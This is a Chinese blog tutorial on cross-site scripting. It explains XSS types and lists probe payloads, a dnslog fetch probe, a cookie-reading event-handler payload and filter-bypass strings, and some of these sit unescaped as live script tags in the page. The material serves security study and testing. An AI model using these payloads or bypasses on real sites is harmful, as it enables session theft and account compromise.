<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0,viewport-fit=cover"><title>XSS注入 | Hexo</title><meta name="author" content="John Doe"><meta name="copyright" content="John Doe"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta name="description" content="XSS(跨站脚本攻击)XSS漏洞简单介绍XSS全称跨站脚本(Cross Site Scripting)，为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在H">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS注入">
<meta property="og:url" content="http://example.com/2026/08/05/XSS%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="XSS(跨站脚本攻击)XSS漏洞简单介绍XSS全称跨站脚本(Cross Site Scripting)，为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在H">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/img/butterfly-icon.png">
<meta property="article:published_time" content="2026-08-05T00:37:12.000Z">
<meta property="article:modified_time" content="2026-08-06T00:56:44.937Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/img/butterfly-icon.png"><script type="application/ld+json">{
  "@context": "https://schema.org",
  "@type": "BlogPosting",
  "headline": "XSS注入",
  "url": "http://example.com/2026/08/05/XSS%E6%B3%A8%E5%85%A5/",
  "image": "http://example.com/img/butterfly-icon.png",
  "datePublished": "2026-08-05T00:37:12.000Z",
  "dateModified": "2026-08-06T00:56:44.937Z",
  "author": [
    {
      "@type": "Person",
      "name": "John Doe",
      "url": "http://example.com"
    }
  ]
}</script><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2026/08/05/XSS%E6%B3%A8%E5%85%A5/index.html"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css?v=5.6.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.3.1/css/all.min.css"><script>
    (() => {
      
    const saveToLocal = {
      set: (key, value, ttl) => {
        const data = { value }

        if (ttl != null) {
          data.expiry = Date.now() + ttl * 86400000
        }

        localStorage.setItem(key, JSON.stringify(data))
      },
      get: key => {
        const itemStr = localStorage.getItem(key)
        if (!itemStr) return

        try {
          const data = JSON.parse(itemStr)

          if (data.expiry && Date.now() > data.expiry) {
            localStorage.removeItem(key)
            return
          }

          return data.value
        } catch {
          localStorage.removeItem(key)
        }
      }
    }

    const scriptCache = new Map()
    const cssCache = new Map()
    window.btf = {
      saveToLocal,
      getScript: (url, attr = {}) => {
        if (scriptCache.has(url)) {
          return scriptCache.get(url)
        }

        const promise = new Promise((resolve, reject) => {
          const script = document.createElement('script')

          script.src = url
          script.async = true

          for (const key in attr) {
            script.setAttribute(key, attr[key])
          }

          script.onload = resolve
          script.onerror = reject

          document.head.appendChild(script)
        })

        scriptCache.set(url, promise)

        return promise
      },
      getCSS: (url, id) => {
        if (cssCache.has(url)) {
          return cssCache.get(url)
        }

        const promise = new Promise((resolve, reject) => {
          const link = document.createElement('link')

          link.rel = 'stylesheet'
          link.href = url

          if (id) {
            link.id = id
          }

          link.onload = resolve
          link.onerror = reject

          document.head.appendChild(link)
        })

        cssCache.set(url, promise)

        return promise
      },
      addGlobalFn: (key, fn, name = false, parent = window) => {
        if (!false && key.startsWith('pjax')) return
        const globalFn = parent.globalFn || {}
        globalFn[key] = globalFn[key] || {}
        globalFn[key][name || Object.keys(globalFn[key]).length] = fn
        parent.globalFn = globalFn
      }
    }
  
      
      const metaThemeColor = document.querySelector('meta[name="theme-color"]')
      const activateDarkMode = () => {
        document.documentElement.dataset.theme = 'dark'
        if (metaThemeColor !== null) {
          metaThemeColor.setAttribute('content', '#0d0d0d')
        }
      }
      const activateLightMode = () => {
        document.documentElement.dataset.theme = 'light'
        if (metaThemeColor !== null) {
          metaThemeColor.setAttribute('content', '#ffffff')
        }
      }

      btf.activateDarkMode = activateDarkMode
      btf.activateLightMode = activateLightMode

      const theme = saveToLocal.get('theme')
    
          theme === 'dark' ? activateDarkMode() : theme === 'light' ? activateLightMode() : null
        
      
      const asideStatus = saveToLocal.get('aside-status')
      if (asideStatus !== undefined) {
        document.documentElement.classList.toggle('hide-aside', asideStatus === 'hide')
      }
    
      
    const detectApple = () => {
      if (/iPad|iPhone|iPod|Macintosh/.test(navigator.userAgent)) {
        document.documentElement.classList.add('apple')
      }
    }
    detectApple()
  
    })()
  </script><script>const GLOBAL_CONFIG = {
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  highlight: {"plugin":"highlight.js","highlightCopy":true,"highlightLang":true,"highlightHeightLimit":false,"highlightFullpage":false,"highlightMacStyle":false},
  copy: {
    success: 'Copy Successful',
    error: 'Copy Failed',
    noSupport: 'Browser Not Supported'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  dateSuffix: {
    just: 'Just now',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  lightbox: 'null',
  Snackbar: undefined,
  infinitegrid: {
    js: 'https://cdn.jsdelivr.net/npm/@egjs/infinitegrid@4.13.0/dist/infinitegrid.min.js',
    buttonText: 'Load More'
  },
  isPhotoFigcaption: false,
  islazyloadPlugin: false,
  isAnchor: false,
  percent: {
    toc: true,
    rightside: false,
  },
  autoDarkmode: false
}</script><script id="config-diff">var GLOBAL_CONFIG_SITE = {
  title: 'XSS注入',
  isHighlightShrink: false,
  isToc: true,
  pageType: 'post'
}</script><meta name="generator" content="Hexo 7.1.1"></head><body><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav id="nav"><span id="blog-info"><a class="nav-site-title" href="/"><span class="site-name">Hexo</span></a><a class="nav-page-title" href="/"><span class="site-name">XSS注入</span><span class="site-name"><i class="fa-solid fa-circle-arrow-left"></i><span>  Back to Home</span></span></a></span><div id="menus"></div></nav><div id="post-info"><h1 class="post-title">XSS注入</h1><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2026-08-05T00:37:12.000Z" title="Created 2026-08-05 08:37:12">2026-08-05</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2026-08-06T00:56:44.937Z" title="Updated 2026-08-06 08:56:44">2026-08-06</time></span></div><div class="meta-secondline"><span class="post-meta-separator">|</span><span class="post-meta-pv-cv" id="" data-flag-title=""><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post Views:</span><span id="busuanzi_value_page_pv"><i class="fa-solid fa-spinner fa-spin"></i></span></span></div></div></div></header><main class="layout" id="content-inner"><div id="post"><article class="container post-content" id="article-container"><h1 id="XSS-跨站脚本攻击"><a href="#XSS-跨站脚本攻击" class="headerlink" title="XSS(跨站脚本攻击)"></a>XSS(跨站脚本攻击)</h1><h1 id="XSS漏洞简单介绍"><a href="#XSS漏洞简单介绍" class="headerlink" title="XSS漏洞简单介绍"></a>XSS漏洞简单介绍</h1><h2 id="XSS全称跨站脚本-Cross-Site-Scripting-，为避免与层叠样式表-Cascading-Style-Sheets-CSS-的缩写混淆，故缩写为XSS。这是一种将任意-Javascript-代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在HTML中的恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的，如-cookie窃取等。"><a href="#XSS全称跨站脚本-Cross-Site-Scripting-，为避免与层叠样式表-Cascading-Style-Sheets-CSS-的缩写混淆，故缩写为XSS。这是一种将任意-Javascript-代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在HTML中的恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的，如-cookie窃取等。" class="headerlink" title="XSS全称跨站脚本(Cross Site Scripting)，为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在HTML中的恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的，如 cookie窃取等。"></a>XSS全称跨站脚本(Cross Site Scripting)，为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能，在HTML页面里嵌入恶意代码。当用户浏览该页面时，这些潜入在HTML中的恶意代码会被执行，用户浏览器被攻击者控制，从而达到攻击者的特殊目的，如 cookie窃取等。</h2><h1 id="XSS漏洞原理："><a href="#XSS漏洞原理：" class="headerlink" title="XSS漏洞原理："></a>XSS漏洞原理：</h1><h2 id="形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格，导致“精心构造”的脚本输入后，在输到前端时被浏览器当作有效代码解析执行从而产生危害。"><a href="#形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格，导致“精心构造”的脚本输入后，在输到前端时被浏览器当作有效代码解析执行从而产生危害。" class="headerlink" title="形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格，导致“精心构造”的脚本输入后，在输到前端时被浏览器当作有效代码解析执行从而产生危害。"></a>形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格，导致“精心构造”的脚本输入后，在输到前端时被浏览器当作有效代码解析执行从而产生危害。</h2><h1 id="XSS漏洞危害"><a href="#XSS漏洞危害" class="headerlink" title="XSS漏洞危害"></a>XSS漏洞危害</h1><h2 id="网络钓鱼-，包括获取各类用户账号"><a href="#网络钓鱼-，包括获取各类用户账号" class="headerlink" title="网络钓鱼 ，包括获取各类用户账号"></a>网络钓鱼 ，包括获取各类用户账号</h2><h2 id="窃取用户cookies资料-，从而获取用户隐私信息"><a href="#窃取用户cookies资料-，从而获取用户隐私信息" class="headerlink" title="窃取用户cookies资料 ，从而获取用户隐私信息"></a>窃取用户cookies资料 ，从而获取用户隐私信息</h2><h2 id="劫持用户（浏览器）-会话-，从而执行任意操作"><a href="#劫持用户（浏览器）-会话-，从而执行任意操作" class="headerlink" title="劫持用户（浏览器） 会话 ，从而执行任意操作"></a>劫持用户（浏览器） 会话 ，从而执行任意操作</h2><h2 id="强制弹出广告页面、-刷流量等"><a href="#强制弹出广告页面、-刷流量等" class="headerlink" title="强制弹出广告页面、 刷流量等"></a>强制弹出广告页面、 刷流量等</h2><h2 id="网页挂马"><a href="#网页挂马" class="headerlink" title="网页挂马"></a>网页挂马</h2><h2 id="结合其他漏洞-，如csrf-，-实施进步危害"><a href="#结合其他漏洞-，如csrf-，-实施进步危害" class="headerlink" title="结合其他漏洞 ，如csrf ， 实施进步危害"></a>结合其他漏洞 ，如csrf ， 实施进步危害</h2><h1 id="XSS漏洞探测"><a href="#XSS漏洞探测" class="headerlink" title="XSS漏洞探测"></a>XSS漏洞探测</h1><h2 id="XSS漏洞弹窗函数"><a href="#XSS漏洞弹窗函数" class="headerlink" title="XSS漏洞弹窗函数"></a>XSS漏洞弹窗函数</h2><script>alert(1122)</script>
<script>confirm(1122)</script>
<script>prompt(11)</script>

<h2 id="XSS漏洞控制台函数"><a href="#XSS漏洞控制台函数" class="headerlink" title="XSS漏洞控制台函数"></a>XSS漏洞控制台函数</h2><script>console.log(111)</script>

<h2 id="XSS漏洞dnslog探测函数"><a href="#XSS漏洞dnslog探测函数" class="headerlink" title="XSS漏洞dnslog探测函数"></a>XSS漏洞dnslog探测函数</h2><script>fetch('//xx.dnlog.cn')</script>

<h2 id="XSS漏洞探测-1"><a href="#XSS漏洞探测-1" class="headerlink" title="XSS漏洞探测"></a>XSS漏洞探测</h2><h3 id="登陆，注册，留言，评价，搜索等功能"><a href="#登陆，注册，留言，评价，搜索等功能" class="headerlink" title="登陆，注册，留言，评价，搜索等功能"></a>登陆，注册，留言，评价，搜索等功能</h3><h3 id="数据提交：get-，post-，cookie-，header头部等"><a href="#数据提交：get-，post-，cookie-，header头部等" class="headerlink" title="数据提交：get ，post ，cookie ，header头部等"></a>数据提交：get ，post ，cookie ，header头部等</h3><h3 id="各种插件，组件，富文本编辑器等"><a href="#各种插件，组件，富文本编辑器等" class="headerlink" title="各种插件，组件，富文本编辑器等"></a>各种插件，组件，富文本编辑器等</h3><h3 id="只要是可以输入输出的地方，都可以尝试探测是否存在xss漏洞"><a href="#只要是可以输入输出的地方，都可以尝试探测是否存在xss漏洞" class="headerlink" title="只要是可以输入输出的地方，都可以尝试探测是否存在xss漏洞"></a>只要是可以输入输出的地方，都可以尝试探测是否存在xss漏洞</h3><h2 id="XSS常用Payload"><a href="#XSS常用Payload" class="headerlink" title="XSS常用Payload"></a>XSS常用Payload</h2><h3 id="实际测试常用："><a href="#实际测试常用：" class="headerlink" title="实际测试常用："></a>实际测试常用：</h3><script>console.log(111)</script>

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>    
<details open ontoggle= confirm(document[`coo`+`kie`])>



<h1 id="XSS类型"><a href="#XSS类型" class="headerlink" title="XSS类型"></a>XSS类型</h1><h1 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h1><h2 id="又称非持久型XSS-，这种攻击方式往往具有一次性，只在用户单击时触发。跨站代码一般存在链接中，当受害者请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码通常不存储服务端。"><a href="#又称非持久型XSS-，这种攻击方式往往具有一次性，只在用户单击时触发。跨站代码一般存在链接中，当受害者请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码通常不存储服务端。" class="headerlink" title="又称非持久型XSS ，这种攻击方式往往具有一次性，只在用户单击时触发。跨站代码一般存在链接中，当受害者请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码通常不存储服务端。"></a>又称非持久型XSS ，这种攻击方式往往具有一次性，只在用户单击时触发。跨站代码一般存在链接中，当受害者请求这样的链接时，跨站代码经过服务端反射回来，这类跨站的代码通常不存储服务端。</h2><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20260805084809249.png" alt="image-20260805084809249"></p>
<h1 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h1><h2 id="存储型XSS（-Stored-xss-Attacks），也是持久型XSS-，比反射型XSS更具有威胁性。攻击脚本将被永久的存放在目标服务器的数据库或文件中。这是利用起来最方便的跨站类型，跨站代码存储于服务端（比如数据库中）"><a href="#存储型XSS（-Stored-xss-Attacks），也是持久型XSS-，比反射型XSS更具有威胁性。攻击脚本将被永久的存放在目标服务器的数据库或文件中。这是利用起来最方便的跨站类型，跨站代码存储于服务端（比如数据库中）" class="headerlink" title="存储型XSS（ Stored xss Attacks），也是持久型XSS ，比反射型XSS更具有威胁性。攻击脚本将被永久的存放在目标服务器的数据库或文件中。这是利用起来最方便的跨站类型，跨站代码存储于服务端（比如数据库中）"></a>存储型XSS（ Stored xss Attacks），也是持久型XSS ，比反射型XSS更具有威胁性。攻击脚本将被永久的存放在目标服务器的数据库或文件中。这是利用起来最方便的跨站类型，跨站代码存储于服务端（比如数据库中）</h2><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20260805084903616.png" alt="image-20260805084903616"></p>
<h1 id="Dom型XSS"><a href="#Dom型XSS" class="headerlink" title="Dom型XSS"></a>Dom型XSS</h1><h2 id="DoM是文档对象模型（-Document-Object-Model）的缩写。它是HTML文档的对象表示，同时也是外部内容（例如-JavaScript）与HTML元素之间的接口。解析树的根节点是“-Document”对象。DOM（-Document-object-model），使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。"><a href="#DoM是文档对象模型（-Document-Object-Model）的缩写。它是HTML文档的对象表示，同时也是外部内容（例如-JavaScript）与HTML元素之间的接口。解析树的根节点是“-Document”对象。DOM（-Document-object-model），使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。" class="headerlink" title="DoM是文档对象模型（ Document Object Model）的缩写。它是HTML文档的对象表示，同时也是外部内容（例如 JavaScript）与HTML元素之间的接口。解析树的根节点是“ Document”对象。DOM（ Document object model），使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。"></a>DoM是文档对象模型（ Document Object Model）的缩写。它是HTML文档的对象表示，同时也是外部内容（例如 JavaScript）与HTML元素之间的接口。解析树的根节点是“ Document”对象。DOM（ Document object model），使用DOM能够使程序和脚本能够动态访问和更新文档的内容、结构和样式。</h2><h2 id="它是基于DoM文档对象的一种漏洞，并且DOM型XSS是基于JS上的，并不需要与服务器进行交互（因为前端代码都在客户浏览器上面执行，和服务器无关）。"><a href="#它是基于DoM文档对象的一种漏洞，并且DOM型XSS是基于JS上的，并不需要与服务器进行交互（因为前端代码都在客户浏览器上面执行，和服务器无关）。" class="headerlink" title="它是基于DoM文档对象的一种漏洞，并且DOM型XSS是基于JS上的，并不需要与服务器进行交互（因为前端代码都在客户浏览器上面执行，和服务器无关）。"></a>它是基于DoM文档对象的一种漏洞，并且DOM型XSS是基于JS上的，并不需要与服务器进行交互（因为前端代码都在客户浏览器上面执行，和服务器无关）。</h2><h2 id="那么dom型xss的产生原因是由于前端js代码的DOM操作导致。"><a href="#那么dom型xss的产生原因是由于前端js代码的DOM操作导致。" class="headerlink" title="那么dom型xss的产生原因是由于前端js代码的DOM操作导致。"></a>那么dom型xss的产生原因是由于前端js代码的DOM操作导致。</h2><h2 id="dom就是一个树状的模型，你可以编写Javascript代码根据dom一层一层的节点，去遍历-获取-修改对应的节点-对象-值。通过Js去对网页进行修改，变化执行"><a href="#dom就是一个树状的模型，你可以编写Javascript代码根据dom一层一层的节点，去遍历-获取-修改对应的节点-对象-值。通过Js去对网页进行修改，变化执行" class="headerlink" title="dom就是一个树状的模型，你可以编写Javascript代码根据dom一层一层的节点，去遍历&#x2F;获取&#x2F;修改对应的节点,对象,值。通过Js去对网页进行修改，变化执行"></a>dom就是一个树状的模型，你可以编写Javascript代码根据dom一层一层的节点，去遍历&#x2F;获取&#x2F;修改对应的节点,对象,值。通过Js去对网页进行修改，变化执行</h2><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20260805085001220.png" alt="image-20260805085001220"></p>
<h2 id="Document-对象使我们可以从脚本中对-HTML-页面中的所有元素进行访问。"><a href="#Document-对象使我们可以从脚本中对-HTML-页面中的所有元素进行访问。" class="headerlink" title="Document 对象使我们可以从脚本中对 HTML 页面中的所有元素进行访问。"></a>Document 对象使我们可以从脚本中对 HTML 页面中的所有元素进行访问。</h2><p><img src="C:\Users\lenovo\AppData\Roaming\Typora\typora-user-images\image-20260805085027074.png" alt="image-20260805085027074"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">document.cookie  读取当前网页的Cookie 			[XSS必备]</span><br><span class="line">document.lastModified 获得当前页面的最后修改时间		[识别伪静态]</span><br><span class="line">document.write  向文档中写文HTML或者JS代码		[Dom XSS常见的存在方式]</span><br></pre></td></tr></table></figure>

<h2 id="可能触发DOM型XSS的js操作："><a href="#可能触发DOM型XSS的js操作：" class="headerlink" title="可能触发DOM型XSS的js操作："></a>可能触发DOM型XSS的js操作：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">document.referer</span><br><span class="line">window.name</span><br><span class="line">location</span><br><span class="line">innerHTML</span><br><span class="line">documen.write</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="闭合标签："><a href="#闭合标签：" class="headerlink" title="闭合标签："></a>闭合标签：</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">‘onclick=&quot;alert(1111)&quot;</span><br><span class="line">‘onclick=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br><span class="line">&#x27;&gt;&lt;img src=&quot;#&quot;onmouseover=&quot;alert(&#x27;xss&#x27;)&quot;&gt;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="我们客户端的js可以对页面dom节点进行动态的操作，比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话，但是这些脚本又没有做任何过滤处理的话，那么我们的应用程序就有可能受到DOM-based-XSS的攻击。因此DOM型XSS的攻击步骤如下：1-攻击者构造出特殊的URL、在其中可能包含恶意代码。2-用户打开带有恶意代码的URL。3-用户浏览器收到响应后解析执行，前端使用js取出url中的恶意代码并执行。4-执行时，恶意代码窃取用户数据并发送到攻击者的网站中，那么攻击者网站拿到这些数据去冒充用户的行为操作。调用目标网站接口执行攻击者一些操作。"><a href="#我们客户端的js可以对页面dom节点进行动态的操作，比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话，但是这些脚本又没有做任何过滤处理的话，那么我们的应用程序就有可能受到DOM-based-XSS的攻击。因此DOM型XSS的攻击步骤如下：1-攻击者构造出特殊的URL、在其中可能包含恶意代码。2-用户打开带有恶意代码的URL。3-用户浏览器收到响应后解析执行，前端使用js取出url中的恶意代码并执行。4-执行时，恶意代码窃取用户数据并发送到攻击者的网站中，那么攻击者网站拿到这些数据去冒充用户的行为操作。调用目标网站接口执行攻击者一些操作。" class="headerlink" title="我们客户端的js可以对页面dom节点进行动态的操作，比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话，但是这些脚本又没有做任何过滤处理的话，那么我们的应用程序就有可能受到DOM-based XSS的攻击。因此DOM型XSS的攻击步骤如下：1. 攻击者构造出特殊的URL、在其中可能包含恶意代码。2. 用户打开带有恶意代码的URL。3. 用户浏览器收到响应后解析执行，前端使用js取出url中的恶意代码并执行。4. 执行时，恶意代码窃取用户数据并发送到攻击者的网站中，那么攻击者网站拿到这些数据去冒充用户的行为操作。调用目标网站接口执行攻击者一些操作。"></a>我们客户端的js可以对页面dom节点进行动态的操作，比如插入、修改页面的内容。比如说客户端从URL中提取数据并且在本地执行、如果用户在客户端输入的数据包含了恶意的js脚本的话，但是这些脚本又没有做任何过滤处理的话，那么我们的应用程序就有可能受到DOM-based XSS的攻击。因此DOM型XSS的攻击步骤如下：1. 攻击者构造出特殊的URL、在其中可能包含恶意代码。2. 用户打开带有恶意代码的URL。3. 用户浏览器收到响应后解析执行，前端使用js取出url中的恶意代码并执行。4. 执行时，恶意代码窃取用户数据并发送到攻击者的网站中，那么攻击者网站拿到这些数据去冒充用户的行为操作。调用目标网站接口执行攻击者一些操作。</h3><h1 id="XSS攻击利用"><a href="#XSS攻击利用" class="headerlink" title="XSS攻击利用"></a>XSS攻击利用</h1><h2 id="XSS常用绕过"><a href="#XSS常用绕过" class="headerlink" title="XSS常用绕过"></a>XSS常用绕过</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=1 onerror=alert(1)&gt;  #白名单标签</span><br><span class="line">&lt;scRipt&gt;alert(1)&lt;/sCript&gt;  #大小写转换</span><br><span class="line">&lt;scri&lt;script&gt;pt&gt;alert(1)&lt;/scri&lt;script&gt;pt&gt;  #标签嵌套绕过单次移除</span><br><span class="line">&#x27; onmouseover=alert(111) &#x27; #处理尖括号未处理引号</span><br><span class="line">javascript:console.log(&#x27;test&#x27;)  #a标签href属性内且无法闭合属性，使用伪协议</span><br><span class="line">&#x27;;alert(1);//  #script标签内的测试，对尖括号有处理</span><br><span class="line">其他payload查询 http://html5sec.org/</span><br></pre></td></tr></table></figure>

</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>Author: </span><span class="post-copyright-info"><a href="http://example.com">John Doe</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>Link: </span><span class="post-copyright-info"><a href="http://example.com/2026/08/05/XSS%E6%B3%A8%E5%85%A5/">http://example.com/2026/08/05/XSS%E6%B3%A8%E5%85%A5/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>Copyright Notice: </span><span class="post-copyright-info">All articles on this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless otherwise stated.</span></div></div><div class="tag_share"><div class="post-share"><div class="social-share" data-image="/img/butterfly-icon.png" data-sites="facebook,x,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.6/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1.1.6/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related" href="/2026/08/05/SQL%E6%B3%A8%E5%85%A5/" title="SQL注入"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info"><div class="info-1"><div class="info-item-1">Previous</div><div class="info-item-2">SQL注入</div></div><div class="info-2"><div class="info-item-1">SQL注入原理及介绍一. 什么是SQL注入SQL注入是黑客利用网站的输入框,输入事先定义好的SQL查询语句,而网站又没有对输入进行数据合法性的过滤或者判断,导致这一串输入欺骗了数据库服务器来执行了一系列非授权的查询来得到想要的数据信息二. SQL注入产生的条件 web网站需要使用数据库 传递给后端的参数可以控制,可以控制输入信息 变量未存在过滤或者过滤不完全 参数内容会被带入到数据库进行查询  三.SQL注入危害：1 - 数据库信息泄露2- 网页篡改：通过操作数据库对特定网页进行篡改，嵌入网马链接，进行挂马攻击。3- 数据库被恶意操作：数据库服务器被攻击，数据库的系统管理员帐户被更改。4- 服务器被远程控制：黑客可以修改或控制操作系统。5- 种植木马：瘫痪全系统。四.SQL注入常用函数：version()mysql版本database()数据库名current_user()当前用户名@@datadir数据库路径@@basedir数据库安装路径五. SQL注入漏洞分类体系1.数据库类型1) 分类关系型数据库(SQL):Access、MySQL、Oracle、PostgreSQL、S...</div></div></div></a><a class="pagination-related" href="/2026/08/04/%E6%95%B0%E9%80%9A%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" title="数通网络基础知识"><div class="cover" style="background: var(--default-bg-color)"></div><div class="info text-right"><div class="info-1"><div class="info-item-1">Next</div><div class="info-item-2">数通网络基础知识</div></div><div class="info-2"><div class="info-item-1">数通网络基础知识VRP系统1.VRP系统概述VRP是华为公司数据通信产品的通用操作系统平台，作为华为公司从低端到核心的全系列路由器、以太网交换机、业务网关等产品的软件核心引擎。VRP提供以下功能：⚫ 实现统一的用户界面和管理界面⚫ 实现控制平面功能，并定义转发平面接口规范⚫ 实现各产品转发平面与VRP控制平面之间的交互⚫ 屏蔽各产品链路层对于网络层的差异(1) 文件系统文件系统是指对存储器中文件、目录的管理，功能包括查看、创建、重命名和删除目录，拷贝、移动、重命名和删除文件等。掌握文件系统的基本操作，对于网络工程师高效管理设备的配置文件和VRP系统文件至关重要。 (2)存储设备存储设备包括：SDRAM、Flash、NVRAM 、SD Card、USB。 (3)设备管理用户对设备的常见管理方式主要有命令行方式和Web网管方式两种。用户需要通过相应的方式登录到设备后才能对设备进行管理。 (4)VRP用户界面用户通过命令行方式登录设备时，系统会分配一个用户界面用来管理、监控设备和用户间的当前会话。设备系统支持的用户界面有Console用户界面和虚拟类型终端VTY（Virtual Typ...</div></div></div></a></nav></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/butterfly-icon.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">John Doe</div><div class="author-info-description"></div><div class="site-data"><a href="/archives/"><div class="headline">Articles</div><div class="length-num">4</div></a><a href="/tags/"><div class="headline">Tags</div><div class="length-num">0</div></a><a href="/categories/"><div class="headline">Categories</div><div class="length-num">0</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/xxxxxx"><i class="fab fa-github"></i><span>Follow Me</span></a></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>Announcement</span></div><div class="announcement_content">This is my Blog</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>Contents</span><span 